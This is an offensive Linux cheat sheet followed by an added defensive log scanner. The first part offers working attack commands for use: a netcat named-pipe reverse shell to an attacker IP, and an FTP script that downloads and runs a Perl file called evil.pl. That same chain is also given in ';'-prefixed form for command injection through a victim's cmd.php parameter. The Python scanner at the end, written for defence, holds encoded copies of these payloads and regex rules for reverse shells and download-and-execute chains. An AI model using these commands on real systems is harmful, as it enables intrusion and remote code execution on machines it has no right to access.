Linux Snippets
Netcat without -e
Many machines have netcat installed, but a build without the -e option cannot spawn a shell directly. The named pipe below works around that: the shell reads its input from the pipe and netcat writes what it receives back into it.
mknod /tmp/backpipe p; /bin/sh 0</tmp/backpipe | nc <ATTACKER IP> <PORT> 1>/tmp/backpipe
FTP Non Interactive Transfer
Non-interactive FTP file transfer on Linux is slightly different from Windows. Paste the following into your terminal and it builds and runs the helper script for you; just change HOST, USER, PASSWD and FILE to match your needs.
# Write the FTP helper script line by line; change HOST, USER, PASSWD and FILE
echo "#!/bin/sh" > ftp.sh
echo "HOST='<IP ADDRESS>'" >> ftp.sh
echo "USER='secret'" >> ftp.sh
echo "PASSWD='password1234'" >> ftp.sh
echo "FILE='evil.pl'" >> ftp.sh
echo "" >> ftp.sh
# ftp -n skips auto-login; the here-document feeds the commands, so the
# terminator after 'quit' must be the same word that follows '<<'
echo "ftp -n \$HOST << END_SCRIPT" >> ftp.sh
echo "quote USER \$USER" >> ftp.sh
echo "quote PASS \$PASSWD" >> ftp.sh
echo "bin" >> ftp.sh
echo "get \$FILE" >> ftp.sh
echo "quit" >> ftp.sh
echo "END_SCRIPT" >> ftp.sh
echo "exit 0" >> ftp.sh
# Run the helper, then the file it fetched
chmod +x ftp.sh
bash ftp.sh
chmod +x evil.pl
perl evil.pl
Alternatively, if you want to run this through a browser against a command-execution parameter such as:
http://victim.com/cmd.php?cmd=<COMMANDS HERE>
just add a semicolon to the beginning of each line and paste the result into the <COMMANDS HERE> section.
One thing to note is that the shebang line sometimes doesn't pass through because of its special characters (such as #). Encoding it may help.
;echo "#!/bin/sh" > ftp.sh
;echo "HOST='<IP ADDRESS>'" >> ftp.sh
;echo "USER='secret'" >> ftp.sh
;echo "PASSWD='password1234'" >> ftp.sh
;echo "FILE='evil.pl'" >> ftp.sh
;echo "" >> ftp.sh
;echo "ftp -n \$HOST << END_SCRIPT" >> ftp.sh
;echo "quote USER \$USER" >> ftp.sh
;echo "quote PASS \$PASSWD" >> ftp.sh
;echo "bin" >> ftp.sh
;echo "get \$FILE" >> ftp.sh
;echo "quit" >> ftp.sh
;echo "END_SCRIPT" >> ftp.sh
;echo "exit 0" >> ftp.sh
;chmod +x ftp.sh
;bash ftp.sh
;chmod +x evil.pl
;perl evil.pl
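Added example from the defender's side, not code from the original page: a small Python scanner that percent-decodes the query string of web-server access log lines and flags both techniques above, the backpipe netcat shell and the ;echo-built FTP fetch chain delivered through a cmd.php?cmd= parameter. The log lines, the 203.0.113.9 address and the rule names are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache-style access log lines (not real traffic): the first two
# carry the backpipe netcat shell and the scripted FTP fetch from this page
# through a cmd.php?cmd= parameter, the third is an ordinary page request.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /cmd.php?cmd=mknod%20/tmp/backpipe%20p;/bin/sh%200%3C/tmp/backpipe%20|%20nc%20203.0.113.9%204444%201%3E/tmp/backpipe HTTP/1.1" 200 12
10.0.0.5 - - [10/Oct/2023:13:56:01 +0000] "GET /cmd.php?cmd=;echo%20%22ftp%20-n%20%5C$HOST%20%3C%3C%20END_SCRIPT%22%20%3E%3E%20ftp.sh;echo%20%22quote%20USER%20%5C$USER%22%20%3E%3E%20ftp.sh;bash%20ftp.sh;perl%20evil.pl HTTP/1.1" 200 12
10.0.0.7 - - [10/Oct/2023:13:57:10 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120
"""

# Common log format: source, identd, user, [timestamp], "METHOD target HTTP/x"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)

# Detection rules keyed by the technique from the snippets above. They run on
# the decoded query string, since the injected commands arrive percent-encoded.
RULES = {
    "netcat backpipe reverse shell": re.compile(r"mknod\s+\S+\s+p\b.*\bnc\s+\S+\s+\d+"),
    "scripted ftp fetch": re.compile(r"ftp\s+-n\b.*quote\s+(USER|PASS)\b"),
    "download-and-execute chain": re.compile(r"\b(bash|sh)\s+\S+\.sh\s*;.*\b(perl|python|sh)\s+\S+"),
    "stacked commands via ;echo": re.compile(r"(;\s*echo\b[^;]*>>\s*\S+){2,}"),
}

def decode_query(target):
    """Percent-decode the query part of a request target ('' when there is none)."""
    _, _, query = target.partition("?")
    return unquote_plus(query)

def scan_log(text):
    """Return one finding per log line that trips at least one rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:  # skip malformed lines rather than crash on them
            continue
        decoded = decode_query(m.group("target"))
        hits = [name for name, rx in RULES.items() if rx.search(decoded)]
        if hits:
            findings.append({"src": m.group("src"), "ts": m.group("ts"),
                             "hits": hits, "decoded": decoded})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} -> {', '.join(f['hits'])}")
```

Run it against a real access log by passing the file contents to scan_log; the rules are deliberately loose, so treat a hit as a trigger for looking at the full request rather than as proof of compromise.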